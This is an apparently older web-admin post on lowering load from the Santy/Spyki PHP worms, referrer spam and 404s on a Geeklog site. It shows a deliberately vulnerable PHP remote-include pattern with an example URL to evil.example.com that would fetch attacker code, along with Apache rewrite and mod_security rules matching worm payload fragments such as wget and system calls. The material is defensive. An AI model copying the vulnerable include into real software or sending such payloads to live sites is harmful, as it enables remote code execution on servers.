Most tips to speed up a site revolve around optimizing SQL queries or throwing bigger and better hardware at the problem. But if you check your logfiles these days, you'll find a lot of nonsensical requests that can also have a dramatic negative impact on your site's performance. Here are a few tips on how to deal with them ...
Santy and other worms

The outbreak of the original Santy worm, which only attacked phpBB boards, was quickly followed by variants (now called Spyki or PhpInclude worm) that target all PHP scripts out there - including Geeklog.
The Spyki worm tries to exploit a common programming mistake in PHP scripts where the author includes another file based on some parameter passed in the URL. The worm simply tries to exploit this with a brute-force attack on all parameters it can find for a script.
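To illustrate, here's a minimal sketch of the vulnerable pattern the worm probes for (the file name vulnerable.php and the parameter name page are made up for this example):

<?php
// vulnerable.php - do NOT use this pattern!
// The script includes whatever file the URL parameter points to, e.g.
//   vulnerable.php?page=contact
// With allow_url_fopen enabled, a request like
//   vulnerable.php?page=http://evil.example.com/payload
// makes PHP fetch and execute the attacker's code on your server.
include($_GET['page'] . '.php');

// A safer version only accepts values from a fixed whitelist:
$allowed = array('contact', 'about', 'news');
if (in_array($_GET['page'], $allowed)) {
    include($_GET['page'] . '.php');
}
?>

The worm doesn't know which parameter (if any) a script uses this way, which is why it hammers every parameter it can find.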
Geeklog itself is not vulnerable to this attack (I can't speak for all the existing plugins and other add-ons, but I'm not aware of any problems with them at the moment). But the sheer number of requests caused by this worm can really slow down a Geeklog site.
So what can we do? The idea is to detect the worm's requests on the server before they're actually executed, i.e. to use the webserver's abilities to catch these requests and make sure the PHP script they're trying to attack is never run. This saves CPU time (for calling up the PHP interpreter) and DB load (for creating sessions, loading the blocks, etc.).
On geeklog.net, we currently use this in the site's .htaccess file:
# attempts to stop the Santy worm
RewriteEngine On
# fragments of the shell commands and function calls in the worm's payload
RewriteCond %{QUERY_STRING} ^(.*)wget%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
# the double-encoded quote from the original phpBB highlight exploit
RewriteCond %{QUERY_STRING} ^(.*)highlight=%2527 [OR]
# the Perl user agent some variants send their requests with
RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC,OR]
# the serialized "test1" probe value the worm passes in a cookie
RewriteCond %{HTTP_COOKIE} s:(.*):%22test1%22%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
As explained above, this tries to detect patterns typical of the worm's requests and then redirects them to 127.0.0.1. While it is unlikely that the worm will even follow that redirect, it at least saves our webserver the trouble of executing the nonsensical request.
This is not the place to explain how Apache's mod_rewrite works. Check the Apache manual if you want to learn more about it.
The above rules are derived from similar ones you can find on the web.
This site, for example, has similar rules for mod_security (an Apache 2 module) and also discusses some flaws in the above rules (but they seem to work for us for now ...).
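For reference, here's a rough sketch of what such rules can look like in mod_security 1.x. This is from memory and untested - treat the patterns as assumptions and check the mod_security documentation before using anything like it:

# mod_security normalizes (URL-decodes) requests before matching,
# so the patterns can be written in plain text
SecFilterEngine On
SecFilter "wget "
SecFilter "echr"
SecFilter "esystem"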
Referrer spam

The same approach can also be used against those stupid referrer spam requests. If you check your logfiles, you'll often find requests allegedly coming from porn or mortgage sites. If you look closely, you'll notice that they only send a single request for a story or a forum post and never load any images. So it's not someone actually following a link to your site - it's just a stupid bot trying to draw attention to that site.
Again, if those requests come in a lot, they can increase the server load quite a bit. So we use the same idea as for the worms to catch them before the PHP script is even executed:
# Referrer spam :-(
# match the spamvertised domains anywhere in the referrer
# (note the escaped dots - a literal . would match any character)
RewriteCond %{HTTP_REFERER} ^http://.*hosting4u\.gb\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://.*4free\.gb\.com.*$ [NC]
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
The two URLs in this example are from a batch of sites currently being used in referrer spam. They will probably be gone in a few days or weeks and replaced by others.
And that is the main problem with referrer spam: it's a moving target. So most of the time, I'd say don't bother and just ignore it. Use the above only if you see a lot of these requests and your server's load is increasing because of them.
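If you do block them and would rather answer with a plain "403 Forbidden" than a redirect, Apache's SetEnvIf directive works as well. A sketch, reusing the two example domains from above:

# mark requests whose referrer contains one of the spamvertised domains ...
SetEnvIfNoCase Referer "hosting4u\.gb\.com" spam_ref
SetEnvIfNoCase Referer "4free\.gb\.com" spam_ref
# ... and refuse to serve them (Deny overrides Allow here)
Order Allow,Deny
Allow from all
Deny from env=spam_ref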
404s and home-made problems

A few days ago, I was debugging a script and wondering why it caused SQL requests even after it had collected all the data it needed to display the page. The reason: it was trying to load an image that wasn't there. And because I had set up Apache to use Geeklog's 404.php for the "404 Not Found" error message, that script was called up every time the image couldn't be found.
In case you're not aware, you can set up your own 404 page in a .htaccess like this:
ErrorDocument 404 /404.php
So now every time a file is not found, the error message comes nicely wrapped in Geeklog.
However, that also means that every 404 causes the execution of a PHP script and requests to the database. So if you have a lot of 404s, you're creating a lot of load for both your webserver and your database. Check your logfiles regularly and try to fix those 404s.
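You can also take some of that pressure off for static files: give directories that only hold images their own static error page, so a missing image doesn't fire up PHP and the database at all. A minimal sketch (the /images directory and the /errors/404.html page are made up):

# in a separate .htaccess inside your /images directory:
# missing files get a plain HTML page instead of Geeklog's 404.php
ErrorDocument 404 /errors/404.html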
Hope these tips help someone ...
bye, Dirk